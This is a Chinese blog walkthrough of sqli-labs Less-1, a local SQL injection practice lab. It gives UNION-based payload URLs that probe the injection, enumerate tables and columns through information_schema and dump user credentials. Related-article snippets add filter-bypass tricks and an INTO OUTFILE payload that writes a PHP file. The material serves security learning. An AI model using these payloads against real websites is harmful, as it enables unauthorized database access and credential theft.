sqli-labs Less-1

最新推荐文章于 2025-02-26 23:09:30 发布
最新推荐文章于 2025-02-26 23:09:30 发布
阅读量93 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: 数据库 php
原文链接:https://yq.aliyun.com/articles/666706
本文详细介绍如何通过SQL注入漏洞获取数据库信息的过程,包括发现注入点、确定字段数量、联合查询等步骤,并最终获取到了用户表中的账号密码。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1.首先来到less-1

img_4c6336accdc59c7110bb38a88e0ad61d.png
1.png

img_c4781cd8f3de325e60fadb54d5692a65.png
2.png

2.请以数字值作为参数输入id。

  • url后面输入?id=1
img_aca6ff679218ae84c21a8e7597fbe519.png
3.png

大家可能此时与我不同的是

your sql statement is SELECT * FROM users WHERE id='1' LIMIT 0,1

这是为了方便我们自己看到底执行的sql语句是什么显示出来的。那么你也可以添加以下,方法如下:
编辑less-1下的index.php文件
将代码echo "your sql statement is ".$sql."<br>";插入到如下图所示位置

img_73696d4580ace231a3f6058f711bb1f5.png
4.png

之后刷新页面即可。
3.寻找注入点

  • 在正常的参数值后面后加一个英文字符 ',可以看到页面出现了异常,说明此处可能存在注入。
img_c2b87c32260877830fa9163550562cbd.png
5.png
  • 接下来在后面加入--+,发现页面显示正常,这是因为--+注释了后面的sql语句,即注入的'正好闭合了sql语句中的单引号,如下:
img_6921898d6ae5b85761a21455a7fbb91e.png
图片.png
  • 然后继续注入' and 1=1’ and 1=2,进一步确认注入点,如下:
    ' and 1=1页面显示正常,’ and 1=2页面显示不正常。
img_2d4aa4d0a6ee67f61ca376dc5efd512d.png
图片.png
img_4577e851a72f37ceae324e9cbf6fbbb5.png
图片.png

至此,我们可以确认此注入点存在sql注入

4.接下来用order by 语句猜有几个字段
实际操作中采用二分法。
当插入?id=1' order by 3 --+,页面正常显示:

url:

http://127.0.0.1/sqli-labs/Less-1/?id=1'

img_5a8466783c502652d9ecf23784a298b8.png
6.png

当插入?id=1' order by 4 --+,页面异常:

img_70e11a76b34a7fabac8122886a37d04b.png
7.png

此时说明查询的表中有3个字段
5. 此时可以继续使用 union select联合查寻。

img_281b46adeb99cfa71e5e8ddfed9cf355.png
8.png

页面正常无变化,没关系,这是limit 限制了只显示一条结果,即前面id = 1 已经有一个结果了,那好,我们将前面设置为0,让它查不到结果看看.

url:    http://127.0.0.1/sqli-labs/Less-1/?id=0%27%20union%20select%201,2,3%20--+

img_ea9bc5d91091f73f39c10492f56c3f9a.png
9.png

惊喜吧!!看到2,3了吧。
说明第2、3个字段可以显示到页面
6. 先来看看常用查询的数据库,版本号,当前登录的账号信息吧!

img_172b5d191b9a14868f750bea91ac15a8.png
10.png
img_83b1109eb1ca3a9d93cdecfa1431bd76.png
11.png

可以查询到数据库名security,版本5.5.53,当前登录账户:root@localhost
7. 接下来查表名
url:

http://127.0.0.1/sqli-labs/Less-1/?id=0' union select 1,2,table_name from information_schema.tables where table_schema = "security" --+
img_4f34a0cdbbd5ab631d298897a3867138.png
12.png

可以看到查询到一个表,接下来使用group_concat()函数将所有表列出来
url:

http://127.0.0.1/sqli-labs/Less-1/?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = "security" --+

img_7d9262c82fd855b891227b23365be9f2.png
13.png

可以看到一共四个表:emails,referers,uagents,users
8.接下来查关注的users表中字段
url:

http://127.0.0.1/sqli-labs/Less-1/?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name = "users" and table_schema = "security" --+

img_9cec2493812a3edd15bf29f89be89f2b.png
14.png

9. 最后就是查看表中字段内容了
url:
http://127.0.0.1/sqli-labs/Less-1/?id=0' union select 1,group_concat(username),group_concat(password) from users --+

img_ffa271345fc62f6cfd0b141a43e3e208.png
15.png

10.这样有点不美观,可以这样做:
url:

http://127.0.0.1/sqli-labs/Less-1/?id=0' union select 1,2,concat_ws("~",username,password) from users --+
img_44f835f112cb0365689ea86061f5851f.png
16.png

显示了一个用户名密码,不爽:
url:

http://127.0.0.1/sqli-labs/Less-1/?id=0' union select 1,2,group_concat(concat_ws("~",username,password)) from users --+
img_d5945a59a4168294050913a1c4d9f62a.png
17.png

这样就完美了,nice.

最后附图一张,information_schema数据库主要表结构

img_6152d30b7218c8f9dc7510aac1376935.png
image.png

说明:当数据库版本大于5以上,数据库中将有information_schema数据库,这个数据库中包含数据库里面所有数据库的表、字段以及数据库名字。
schemata 这张表存放了所有数据库的信息
tables 这张表存放了所有数据库的所有表的信息
columns 这张表存放了所有数据库的所有表中的字段信息

sqli-labs第一关详解 纯新手向 含原理
髣髴兮若轻云之蔽月
04-23 3031
Less-01 为方便初学者理解,更改了sqli-labs的源码,以显示sql语句 后期学习中需要自己推理 初始页面 在url后面用get传值id=1,随后能看到网页出现变化 如下图 不断更改上传id的值,会有不同的用户信息显示。 按递增顺序直到14为止, 即(1~14) 判断注入点是否存在且能否使用 一般使用单引号进行判断,加到url后面 出现报错 内容大致为LIMIT0,1附近有语法错误。 为什么要使用单引号进行判断 实际上,我们可以看到sql语句为 SELECT * FROM users
sqli-labs靶场less-1
wanggonghanfei的博客
09-29 366
在url后面写?id=1,有回显,输入?id=2,也有回显,输入?id=0,回显判断有注入加单引号:?id=1’报错,从 ’ ‘1’ ’ LIMIT 0,1’ 可以得知,多一个单引号,怀疑为数字型注入因为单引号需要闭合,同时原先查询语句的单引号需要注释掉,构造语句第一个单引号闭合sql语句的查询,–注释掉原先语句的的单引号,+在表示空格,回显:构造:?id=1’ and 1=2 --+,回显:确定为数字型注入。
Sqli-Labs做题笔记:Less-21 - Less-26a
Forever_Han13的博客
01-23 615
绕过: 过滤关键字 穿插关键字绕过: select selselctect or oorr union ununionion 大小写转换: select SelECt or Or union uNIon 十六进制转换: select selec\x74 or o\x72 union unio\x6e 双重URL编码: select %25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34
sqli-labs通关全攻略
网安小白
07-22 741
第七步 查看users表中username,password的数据。这里存放着运行出来的数据,以表格的方式呈现。第六步 查看user表中列。根据显示,应该有四个字段。第三步 查看回显位置。
sqli-labs less-1
weixin_43127546的博客
10-09 881
sqli-labs less01
sqli-labs Less1-4闯关
m0_60829468的博客
10-19 306
目录 SQL注入思路 一、Less-1 1.打开靶场第一关我们发现提示,说的是有一个参数:ID。 2.按照提示输入ID返现新的界面,提示ID的值为数字。 3. 将ID的设置为1查看页面返回结果(id需要变为小写)。 4.更换不同的id值发现,不同的值页面会出现不同的用户名和密码;说明这个靶场id作为一个参数,对数据库进行了查询,数据库在进行查询时会对参数进行特殊标明"参数"('参数'),我们可以多加一个引号看看会不会造成意想不到的事。 5. 发现出现数据库报错,证明输入的数据库查询语言有问题。
sqli-labs靶场练习笔记
11-09
- **示例**:`http://127.0.0.1/sqli-labs-master/less-7/?id=-1')) union select 1,2,'($_POST["lcy"]);?>' into outfile 'D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php'--`。 - **第8关:基于延迟的...
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
sqli-labs实验指导手册
11-17
1. **字符型联合注入**(如less-1): - **注入点检测**:通过修改查询参数(如?id=1' and 1=1),观察页面响应变化来判断是否存在注入。 - **闭合方式判断**:通过输入特殊字符(如\)来测试闭合方式,确认是单...
SQL注入——sqli-labsLess-1
E-Malon的博客
05-29 446
一边查看源码,一边多方学习别人的 WriteUp,在此过程中补充基础知识,最终落到实验操作。慢慢来,比较快。欢迎大咖指导,欢迎各位网友交流经验。
sql-labs-less1 基于显错的union注入全过程
Mysmycbx的博客
07-03 701
sql-labs-less1 step0 准备 http://localhost/sqli-labs/Less-1/ HackBar MySQL Apache step1 测试 首先我们假装不知道后台的代码。其中sql查询语句为sql=“SELECT * FROM users WHERE id=’$id’ LIMIT 0,1”; payload: http://localhost/sqli-labs/Less-1/?id=1 --+ mysql: SELECT * FROM users WHER
sqli-lab Less1-10通关
weixin_65725423的博客
09-23 1304
页面中“Please input the ID as parameter with numeric value”意思是请以数字值作为参数输入用户标示符。首先判断这是数字注入还是字符注入。经过语句and 1=2测试 ,页面回显正常,所以该地方不是数值查询。然后在id后面加个',就会报错,可能是字符型注入输入--+将sql后面的语句注视掉后,发现页面回显正常,则证明这个地方是单引号字符型注入然后用order by 来判断有多少列数据,order by 3,发现是页面正常。
sqli-labs通关攻略【Less-1 Less-2 Less-3 Less-4】
最新发布
qq_65379983的博客
02-26 2424
sqli-labs靶场搭建 sql注入基础练习 sqli靶场练习通关详解
记一次sql注入过程 — sqli-labs(Less-1)
星虐
03-14 563
1.进入环境就是这样的界面 2.尝试将URL中 id=1 改为 id=1’ and 1='1 页面正常 3.尝试将URL中 id=1 改为 id=1‘ and 1='2 页面显示不正常 (由步骤2和步骤3可确定为单引号注入) 4.使用 order by 语句进行字段查询 –+为SQL注入中URL里使用的注释符 构造 id=1’ order by 1 --+ 页面显示正常 构造 id=1’ order by 2 --+ 页面显示正常 构造 id=1’ order by 3 --+ 页面显示正常 构造
sqli-labs(less-1)
墨鱼菜鸡
09-10 576
目录 less-1(union联合注入) 1.根据注入位置数据类型将sql注入分类(以localhost/sqli-labs/less-1为例子) 2.利用order判断字段数 3.利用union select 联合查询,将id值设置成不成立,即可探测到可利用的字段数 4.利用函数database(),user(),version()可以得到...
SQL注入之sqli-labsLess1~10史上最详细通关教程
qq_49502930的博客
11-14 7164
SQL注入之sqli-labs详细通关教程 首先需要准备好火狐浏览器(方便下载hackbar这个插件)还有phpstudy搭建,以及sqli-labs搭建。其次,我们需要有一定的数据库基本语句基础,通关时有必要的语句我会解释,也希望大家可以自己在网上查找学习相关语句。 下面展示一些 基本语句。 查库:select schema_name from information_schema.schemata 查表:select table_name from information_schema.tables w
sqli-labs靶场Less-6
songling515010475的专栏
08-21 205
1、访问首页,/Less-6/index.php?id=1,这里的传参点是id 探测五步曲 判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 http://192.168.21.144:8080/sqlilabs/Less-6/index.php?id=1" and 1=2-- qwe 2、存在SQL注入,但是这里不存在回显点,故意输出错误的SQL,看页面是否报错,如果报错有回显哪么就可以使用报错注入,如果报错也没有.
sqli-labs教程——Less 1-10
Lilin's博客
12-10 2259
sqli-labs教程——Less 1-10 Page-1 Basic ChallengesLess-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)1. 判断是否有注入点2. 判断闭合字符3. 判断当前页面中sql语句的查询列数4. 判断数据在页面中的回显位置和sql语句中回显位5. 判断当前页面连接的数据库名称6. 判断security数据库中的表名称信息7. 判断users表的列名称信息8. 查询users表的所有信息Less
sql字符型注入-sqli1
weixin_46784800的博客
11-04 477
sql注入知识 dvwa 1' order by 1# 1' order by 2# 1' order by 3# 排序 1' union select 111,222,333 ---可以查看前端与数据库之间的联系,即数据库在前端显示的出口! 1' union select database(),user()# 联合查询 database() 查询数据库名字 user() 返回当前查询的用户名 1' union select version(),@@version_compile_os# ver
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值